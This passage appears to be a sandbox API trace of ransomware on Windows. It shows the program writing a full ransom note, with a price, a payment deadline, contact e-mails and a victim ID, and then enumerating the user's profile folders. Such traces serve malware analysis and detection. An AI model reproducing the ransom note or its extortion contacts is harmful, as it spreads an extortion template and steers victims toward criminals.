lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.974] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.974] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.975] CloseHandle (hObject=0x6f0) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0142.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0142.976] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.976] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x9ac1730 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.976] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x3275b70 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b288 | out: hHeap=0x620000) returned 1 [0142.977] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x9ac3460 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c6c8 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3275b70 | out: hHeap=0x620000) returned 1 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.977] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3280a80 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c6c8 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b288 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac3460 | out: hHeap=0x620000) returned 1 [0142.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.978] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xafd0b720, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xafd0b720, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x3203a90 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c6c8 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d068 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d010 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.978] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfb9ec80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfb9ec80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x32790f0 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32790f0 | out: hHeap=0x620000) returned 1 [0142.978] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x32790f0 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x3282668 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b428 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b1b8 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c6c8 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b288 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d068 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3203a90 | out: hHeap=0x620000) returned 1 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32790f0 | out: hHeap=0x620000) returned 1 [0142.979] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x32790f0 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32790f0 | out: hHeap=0x620000) returned 1 [0142.980] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d068 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d068 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.980] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b490 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3255a48 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d118 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b4f8 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d068 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c6c8 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321cc48 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b560 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b5c8 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d170 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c988 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b428 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d010 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b1b8 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b288 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3282668 | out: hHeap=0x620000) returned 1 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b490 | out: hHeap=0x620000) returned 1 [0142.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.980] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfc37200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfc37200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b490 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b490 | out: hHeap=0x620000) returned 1 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b358 | out: hHeap=0x620000) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, 